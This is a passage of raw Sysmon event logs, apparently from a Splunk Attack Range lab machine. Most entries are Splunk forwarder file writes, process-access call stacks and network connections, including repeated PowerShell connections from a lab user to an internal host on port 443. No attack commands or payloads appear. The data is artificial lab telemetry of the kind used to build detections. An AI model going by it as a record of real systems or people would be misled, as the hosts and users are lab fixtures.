Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82EA798A2ECA8EB6A1918F24198320D0,SHA256=2F5C21AE673B97F3CDC2B4FFF222AC8021DFF034B413133CCA1F426E016D1E17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497251Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:25.192{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00E33A2B427807593E8BDAE241DB3DA1,SHA256=12C542A7E22CE215E4B15A24F9CD936C10254BADF48A875D3EBBDB225E7857D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497250Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:25.192{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3137BA80495BA1C933F37E1A719FD452,SHA256=0D34B568C0D2C90506F5230B9E39EB1A11E1CB1E7EB16C71C027F53348E87E1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:26.278{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92CDF606F851B2707F3F459B0D4EDC46,SHA256=02E73B3E6867064749F13EF510B3317DB5F1903009E1A7290FD768207C8F91FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497255Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:27.292{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBF2EAB974C64B46356FCD7D3CAA0464,SHA256=E0EA51A07AC5EBD3CA9970F0FED9F5D9222F0AD4E74C46965F7D5386614444A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497254Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:27.245{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B4697A6355A6B6DB5696629D67FD58CD,SHA256=1DF854F78E3226DD47F29FB91BCA5D95F4BE66DB8EDDD4D651EE0A522CE1A95A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036497257Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:57.913{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50511-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497256Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:28.308{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ED17E859D696F445C5E4FCA38677F1C,SHA256=B02E9C0BFDF0AB76EEF485047CCA41F94F5784EFFD0CF306B9430FA12C5221E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497258Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:29.342{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0100276423AD74576663327E6575D37,SHA256=88B7D4CC500867AEE17A7134DCE9C6BEA136BD7FA7C0C4B21607C2101CCDF9E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000036497261Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:16:30.725{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a96a-0xbb737d60) 354300x800000000000000036497260Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:59.792{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50512-false10.0.1.12-8000- 23542300x800000000000000036497259Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:30.357{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC601567C42F5842BE6B7183F9E92C95,SHA256=0FBB44FE13455EAE0C598761BBF8693B4314E4BC28F901699860AC8EE11054C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497262Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:31.387{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE6CA5B5C21EC83114EA09DDE6C5127D,SHA256=ABD306FEB728657CC0A07AD76E6686399D8F7B3123F145561BBFA27968D291F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497265Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:02.338{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local123ntpfalse168.61.215.74-123ntp 23542300x800000000000000036497264Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:32.523{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 
Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497263Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:32.403{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F26AD23EB8B5CDD5F5167724B9247064,SHA256=771AF309B0DA5AA3030E174DEDD2574EF6515743191C7AE78CA4E8CD0484D9FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:03.922{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50513-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497267Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:33.422{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A41A748686F46BF0DBB2B9B0814C796,SHA256=A5724EAF9F4EC930C40C048FDB31CB9ACD506D35DEF55C958AD491C08662C3E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497266Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:33.338{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AA72BB59C7A75F2BDF39B106E4EF4459,SHA256=6094EC3FDD9474E84EA1F79A542E48DAE951819BB83E2874F2D3412F0F0A9EA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497270Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:04.184{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50514-false10.0.1.12-8089- 23542300x800000000000000036497269Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:34.437{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80DCA2EDE8B766D7D4ECCA39F15F7BDB,SHA256=C8BA37C106998657745EB18E6B6E4564023724937FA2969B2A1BB47EC317A5A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497272Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:04.805{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50515-false10.0.1.12-8000- 23542300x800000000000000036497271Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:35.451{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=482B2075F6D1AA04F0CE1E838498A0A6,SHA256=9A756DE5F0F1911F6280662489087B55796BD3DD452C5628E7B64D1A9D7CEA4E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:36.499{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FADBED9EBBA38357359B2D10D199F91,SHA256=0BB21B945F1BBA604826536A2103A4C0E1EA9118A2A61712785B69CF2D1A8227,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497282Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:37.902{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0B5-6140-7C56-04000000C801}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497281Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:37.902{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497280Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:37.902{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497279Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:37.902{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497278Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:37.902{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:37.902{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A0B5-6140-7C56-04000000C801}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497276Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:37.902{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0B5-6140-7C56-04000000C801}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497275Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:37.897{B81B27B7-A0B5-6140-7C56-04000000C801}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497274Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:37.518{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16B44DC7746DE91DA128C94C6FCB7D51,SHA256=88D1DB23E38188270E5321DA81A10CD6F38ED16F8EB3BCD93118717DF1ECEE78,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.917{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1CD1DC7C7903F7BD1B9EE90A45EDC1E5,SHA256=2B6C4505EE26AF26FC9E38ED582D897E8F0C992A52D16C642038E4497FB513E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.917{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00E33A2B427807593E8BDAE241DB3DA1,SHA256=12C542A7E22CE215E4B15A24F9CD936C10254BADF48A875D3EBBDB225E7857D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient 
disk space 10341000x800000000000000036497295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.801{B81B27B7-A0B6-6140-7D56-04000000C801}67966128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.617{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0B6-6140-7D56-04000000C801}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036497293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.933{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50516-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036497292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:38.601{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A0B6-6140-7D56-04000000C801}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497291Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.601{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497290Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:38.601{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497289Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.601{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497288Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
